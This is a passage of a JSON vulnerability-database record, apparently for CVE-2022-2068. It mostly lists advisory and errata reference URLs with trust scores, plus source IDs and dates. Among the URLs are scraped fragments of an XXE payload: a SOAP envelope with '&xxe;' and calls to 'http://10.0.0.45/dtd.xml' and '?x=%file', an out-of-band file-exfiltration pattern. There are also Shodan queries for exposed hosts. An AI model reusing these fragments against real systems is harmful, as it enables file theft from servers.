"url": "https://access.redhat.com/security/cve/cve-2022-42898"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22629"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26717"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35525"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-32208"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26719"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-2509"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26709"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26700"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27405"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-26710"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-1304"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-27404"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-32206"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35527"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-22628"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2022-3515"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/backloop-biz/vulnerability_checker"
},
{
"trust": 0.1,
"url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-319-01"
},
{
"trust": 0.1,
"url": "https://alas.aws.amazon.com/alas-2022-1626.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-43813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27782"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27776"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0670"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22576"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_ceph_storage/5.2/html-single/release_notes/index"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/1548993"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27774"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0670"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25314"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2789521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-25313"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6024"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/openssl"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0759"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32250"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21698"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1012"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32250"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0759"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6051"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30631"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2015-20107"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2023:0408"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30632"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30698"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30629"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1304"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23772"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28131"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0391"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0391"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29526"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-0256"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30633"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1705"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23773"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30630"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24795"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1962"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30635"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-3787"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44716"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0256"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25309"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30699"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25310"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32148"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23806"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1798"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0934"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-0308"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2015-20107"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44717"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8913"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=securitypatches\u0026version=5.7"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8841"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40303"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42915"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42916"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22721"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-35252"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28614"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26377"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-40304"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23943"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-30522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-32221"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-6457-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/nodejs/12.22.9~dfsg-1ubuntu3.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0778"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24448"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:8889"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21618"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0168"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21628"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0924"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0562"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2639"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0908"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1055"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26373"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-20368"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1048"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3640"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0561"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0617"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-39399"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0562"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0854"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29581"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1016"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2078"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-22844"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2938"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21499"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-36946"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42003"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0865"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36558"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0909"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1852"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0561"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0854"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0168"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21624"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21626"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28390"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36558"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-30002"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-27950"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2586"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-23960"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3640"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-30002"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36518"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1184"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25255"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1355"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28893"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/advisories/2024-ibmsecurity.txt"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/oauth/oauth20/authorize?client_id=testauthenticatorclient\u0026response_type=code\u0026scope=mmfaauthn\""
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema\""
},
{
"trust": 0.1,
"url": "https://github.com/jbeder/yaml-cpp/pull/807."
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/"
},
{
"trust": 0.1,
"url": "https://github.com/client9/libinjection/issues/124."
},
{
"trust": 0.1,
"url": "https://dsc-02.test.lan:8443/"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416#issuecomment-2032110397."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-30997"
},
{
"trust": 0.1,
"url": "https://www.digicert.com,"
},
{
"trust": 0.1,
"url": "https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html`."
},
{
"trust": 0.1,
"url": "http://10.0.0.45/?x=%file`,"
},
{
"trust": 0.1,
"url": "https://test-runtime/`)."
},
{
"trust": 0.1,
"url": "https://internet-faced-website/mga/sps/mmfa/user/mgmt/details"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=testauthenticatorclient\u0026code=0nxkrywnfzkcoa5wftzqdk5mkjpv9y`"
},
{
"trust": 0.1,
"url": "https://127.0.0.1:$port"
},
{
"trust": 0.1,
"url": "http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/soap-env:body\u003e\u003c/soap-env:envelope\u003e\u0027"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7106586"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38370"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7155356:"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt"
},
{
"trust": 0.1,
"url": "https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b,"
},
{
"trust": 0.1,
"url": "https://www.zlib.org)"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-31006"
},
{
"trust": 0.1,
"url": "https://info.domain.tld/mga/sps/authsvc?policyid=urn:ibm:security:authentication:asf:qrcode_response\""
},
{
"trust": 0.1,
"url": "https://repo.symas.com/repo/rpm/sofl/rhel8"
},
{
"trust": 0.1,
"url": "https://enroll-url/mga/sps/mmfa/user/mgmt/details`"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-31004"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html"
},
{
"trust": 0.1,
"url": "https://www.shodan.io/search?query=cp%3d%22non+cur+otpi+our+nor+uni%22,"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/ssprek_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:"
},
{
"trust": 0.1,
"url": "http://10.0.0.45/."
},
{
"trust": 0.1,
"url": "https://www.shodan.io/search?query=http.favicon.hash%3a-2069014068,"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema-instance\"\u003e\u003csoap-env:body\u003e\u003cns1:ping"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7158790:"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7106586:"
},
{
"trust": 0.1,
"url": "http://mirror.centos.org/centos/8-stream/appstream/x86_64/os"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-32329"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38267"
},
{
"trust": 0.1,
"url": "https://www.openssl.org),"
},
{
"trust": 0.1,
"url": "https://github.com/jbeder/yaml-cpp/pull/807"
},
{
"trust": 0.1,
"url": "https://info.domain.tld/scim/me\","
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/x"
},
{
"trust": 0.1,
"url": "http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e\u0026xxe;\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/soap-env:body\u003e\u003c/soap-env:envelope\u003e\u0027"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430."
},
{
"trust": 0.1,
"url": "https://dsc.test.lan:8443/dsess/services/dsess"
},
{
"trust": 0.1,
"url": "https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=testauthenticatorclient\u0026code=0nxkrywnfzkcoa5wftzqdk5mkjpv9y"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-30998"
},
{
"trust": 0.1,
"url": "https://dsc-02.test.lan:8443"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema-instance\"\u003e"
},
{
"trust": 0.1,
"url": "https://repo.symas.com/repo/gpg/rpm-gpg-key-symas-com-signing-key"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7106586,"
},
{
"trust": 0.1,
"url": "https://repo.symas.com/configs/sofl/rhel8/sofl.repo"
},
{
"trust": 0.1,
"url": "http://www.chambersign.org,o=ac"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html`."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38368"
},
{
"trust": 0.1,
"url": "https://xerces.apache.org/xerces-c/secadv.html)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-31001"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access"
},
{
"trust": 0.1,
"url": "https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33\u0026arch=x86_64"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters"
},
{
"trust": 0.1,
"url": "https://github.com/jbeder/yaml-cpp."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7145400:"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-31005"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-32328"
},
{
"trust": 0.1,
"url": "https://www.ibm.com)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38371),"
},
{
"trust": 0.1,
"url": "http://mirror.centos.org/centos/8-stream/appstream/x86_64/os/packages/"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]"
},
{
"trust": 0.1,
"url": "https://github.com/spiderlabs/modsecurity/issues/1412)"
},
{
"trust": 0.1,
"url": "https://info.domain.tld/scim/me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:mmfa:transaction:transactionspending,urn:ietf:params:scim:schemas:extension:isam:1.0:mmfa:transaction:attributespending\","
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\""
},
{
"trust": 0.1,
"url": "http://10.0.0.45/?x=%file;\u0027\u003e\"\u003e"
},
{
"trust": 0.1,
"url": "https://repo.symas.com/configs/sofl/rhel8/sofl.repo`:"
},
{
"trust": 0.1,
"url": "https://dsc-02.test.lan:8443/dsess/services/dsess"
},
{
"trust": 0.1,
"url": "https://mirrors.fedoraproject.org/metalink?repo=fedora-33\u0026arch=x86_64"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416"
},
{
"trust": 0.1,
"url": "https://url/sps/mga/user/mgmt/html/device/device_selection.html`"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-32330"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mga/user/mgmt/grant"
},
{
"trust": 0.1,
"url": "https://curl.haxx.se/docs/sslcerts.html"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7145400"
},
{
"trust": 0.1,
"url": "http://mirror.centos.org/centos/8-stream/baseos/x86_64/os"
},
{
"trust": 0.1,
"url": "https://www.digicert.com,o=digicert"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/6989653."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;"
},
{
"trust": 0.1,
"url": "http://sms.am.tivoli.com\"\u003e"
},
{
"trust": 0.1,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1410277"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7155356"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5818)."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications"
},
{
"trust": 0.1,
"url": "https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en)"
},
{
"trust": 0.1,
"url": "https://www.shodan.io/search?query=webseal,"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7145400."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7155356."
},
{
"trust": 0.1,
"url": "https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281"
},
{
"trust": 0.1,
"url": "http://10.0.0.45/dtd.xml\"\u003e"
},
{
"trust": 0.1,
"url": "http://10.0.0.45/dtd.xml`,"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.7,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38369"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416)."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7147932."
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mga/user/mgmt/otp/totp"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7145828."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7158790"
},
{
"trust": 0.1,
"url": "https://twitter.com/cvenew)"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mmfa/user/mgmt/authenticators"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-2068"
},
{
"db": "PACKETSTORM",
"id": "168022"
},
{
"db": "PACKETSTORM",
"id": "169396"
},
{
"db": "PACKETSTORM",
"id": "168112"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170196"
},
{
"db": "PACKETSTORM",
"id": "170165"
},
{
"db": "PACKETSTORM",
"id": "175432"
},
{
"db": "PACKETSTORM",
"id": "170179"
},
{
"db": "PACKETSTORM",
"id": "182466"
},
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2022-2068",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168022",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169396",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168112",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170196",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170165",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "175432",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170179",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "182466",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-2068",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-06-21T00:00:00",
"db": "VULMON",
"id": "CVE-2022-2068",
"ident": null
},
{
"date": "2022-08-10T15:50:41",
"db": "PACKETSTORM",
"id": "168022",
"ident": null
},
{
"date": "2022-06-28T19:12:00",
"db": "PACKETSTORM",
"id": "169396",
"ident": null
},
{
